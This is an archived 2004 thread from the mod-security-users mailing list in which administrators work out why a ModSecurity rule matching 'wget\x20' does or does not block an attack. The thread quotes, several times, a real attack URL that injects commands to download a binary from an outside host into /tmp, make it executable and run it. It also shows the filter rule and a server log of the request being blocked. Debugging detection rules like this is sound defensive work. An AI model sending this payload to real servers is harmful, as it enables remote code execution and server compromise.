Thread: RE: [mod-security-users] Problem with snort rules
Brought to you by:
victorhora,
zimmerletw
From: L. C. L. <CLuther@Xybernaut.com> - 2004-02-04 19:53:41
|
Do any of the other SecFilter filters work? And a silly question, is your filtering actually turned on (SecFilterEngine On)? When I use the URL against one of my internal web servers (Apache Linux), I receive the following error: >>>>>>>>>> Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, xs...@xy... and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. <<<<<<<<<< And when I check the logs, I see the following (IP addresses and names obfuscated): >>>>>>>>>> ======================================== Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET /?basepath=http://w ww.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.trip od.c om.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541 Handler: (null) ---------------------------------------- GET /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget% 20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms- excel, application/msword, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; brip1; . NET CLR 1.1.4322) Host: mysecret Connection: Keep-Alive mod_security-message: Access denied with code 500. Pattern match "wget\x20" at T HE_REQUEST. mod_security-action: 500 HTTP/1.1 500 Internal Server Error Content-Length: 541 Connection: close Content-Type: text/html; charset=iso-8859-1 <<<<<<<<<< So it appears that my 'SecFilter "wget\x20"' is working. - Christopher -----Original Message----- From: Danny Shurett [mailto:dsh...@al...] Sent: Wednesday, February 04, 2004 2:20 PM To: mod...@li... Subject: [mod-security-users] Problem with snort rules I am working on getting my filters configured for a number of webservers. I used a few filters I found in the snort filters that were converted. However, upon further investigation, it didn't yield what I was looking for. Here is the one I think should be tripped: # WEB-ATTACKS wget command attempt SecFilter "wget\x20" Here is a real url (slightly modified) that was used to attack a server. http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi I would have expected the wget filter above to block it. Can anyone help me understand why the filter above doesn't block wget? Am I missing the point? Please be gentle. Thanks. ------------------------------------------------------- The SF.Net email is sponsored by EclipseCon 2004 Premiere Conference on Open Tools Development and Integration See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. http://www.eclipsecon.org/osdn _______________________________________________ mod-security-users mailing list mod...@li... https://lists.sourceforge.net/lists/listinfo/mod-security-users |
From: Danny S. <dsh...@al...> - 2004-02-04 20:03:23
|
Yes, SecFilters are working. If I append a /bin/ps error on the end of it, I get an error. Log file is also being written to. On 2/4/04 2:53 PM, "L. Christopher Luther" <CLuther@Xybernaut.com> wrote: > Do any of the other SecFilter filters work? And a silly question, is your > filtering actually turned on (SecFilterEngine On)? > > When I use the URL against one of my internal web servers (Apache Linux), I > receive the following error: > >>>>>>>>>>> > Internal Server Error > The server encountered an internal error or misconfiguration and was unable > to complete your request. > > Please contact the server administrator, xs...@xy... and inform > them of the time the error occurred, and anything you might have done that > may have caused the error. > > More information about this error may be available in the server error log. > <<<<<<<<<< > > And when I check the logs, I see the following (IP addresses and names > obfuscated): > >>>>>>>>>>> > ======================================== > Request: x.x.x.x - - [[04/Feb/2004:14:48:25 --0500]] "GET > /?basepath=http://w > ww.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget%20http://hac10.trip > od.c > om.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1" 500 541 > Handler: (null) > ---------------------------------------- > GET > /?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&cmd=cd%20/tmp;wget% > 20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/vnd.ms- > excel, application/msword, application/x-shockwave-flash, */* > Accept-Language: en-us > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; > brip1; . > NET CLR 1.1.4322) > Host: mysecret > Connection: Keep-Alive > mod_security-message: Access denied with code 500. Pattern match "wget\x20" > at T > HE_REQUEST. > mod_security-action: 500 > > HTTP/1.1 500 Internal Server Error > Content-Length: 541 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > <<<<<<<<<< > > So it appears that my 'SecFilter "wget\x20"' is working. > > > - Christopher > > > -----Original Message----- > From: Danny Shurett [mailto:dsh...@al...] > Sent: Wednesday, February 04, 2004 2:20 PM > To: mod...@li... > Subject: [mod-security-users] Problem with snort rules > > > I am working on getting my filters configured for a number of webservers. I > used a few filters I found in the snort filters that were converted. > However, upon further investigation, it didn't yield what I was looking for. > Here is the one I think should be tripped: > > # WEB-ATTACKS wget command attempt > SecFilter "wget\x20" > > Here is a real url (slightly modified) that was used to attack a server. > > > http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?& > cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi > > > > I would have expected the wget filter above to block it. Can anyone help > me understand why the filter above doesn't block wget? Am I missing the > point? Please be gentle. Thanks. > > > > ------------------------------------------------------- > The SF.Net email is sponsored by EclipseCon 2004 > Premiere Conference on Open Tools Development and Integration > See the breadth of Eclipse activity. February 3-5 in Anaheim, CA. > http://www.eclipsecon.org/osdn > _______________________________________________ > mod-security-users mailing list > mod...@li... > https://lists.sourceforge.net/lists/listinfo/mod-security-users > > |